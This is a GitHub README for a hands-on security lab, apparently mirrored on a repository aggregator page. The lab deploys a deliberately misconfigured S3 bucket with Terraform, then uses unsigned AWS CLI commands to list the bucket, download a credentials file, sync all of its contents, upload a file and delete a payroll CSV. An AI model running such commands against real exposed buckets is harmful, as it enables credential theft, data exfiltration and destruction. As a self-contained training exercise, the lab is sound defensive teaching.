Giter Club home page Giter Club logo

s3misconfiguration's Introduction

S3 Misconfiguration

Follow the below instructions given to solve this Lab

Note - No aws configuration required for this Lab

please install the below cli tools

  • AWS CLI
sudo apt-get install awscli
  • Terraform - click on the below link for further help on on installing
https://developer.hashicorp.com/terraform/tutorials/aws-get-started/install-cli
  • Step 1 Clone the repository
git clone https://github.com/bvabhishek/s3misconfiguration.git
  • Step 2: Change Directory
cd /s3misconfiguration
  • Step 3: Initialise terraform
terraform init
  • Step 4: Run terraform apply -auto-approve
terraform apply -auto-approve
  • Step 5: Export bucket name
export s3bucket=<bucketname> 
  • Step 6: Lets try to list down the contents of bucket
aws s3 ls s3://$s3bucket
  • Step 7: Now lets perform all the possible attack scenario

  • Step 8: Lets first download the fishy files - change to your current working directory

aws s3 cp s3://$s3bucket/creds.txt /home/abhi/seasides/
  • To download all the files from the bucket use sync command
aws s3 sync s3://$s3bucket /home/abhi/seasides/test/
  • Step 9: Let's upload a new file
aws s3 cp seasides.jpeg s3://$s3bucket --no-sign-request --region us-west-2
  • Step 10: Let's Delete a file
aws s3 rm s3://$s3bucket/emp_pay_dont_delete.csv --no-sign-request --region us-west-2
  • Step 11: Tear Down
terraform destroy -auto-approve
  • By this we know that the attacker has performed all the malicious functionalities ie, CRUD operations which leads to Vulnerabilities such as
  • Broken Authentication
  • Sensitive Information Disclosure

s3misconfiguration's People

Contributors

bvabhishek avatar

Watchers

James Cloos avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.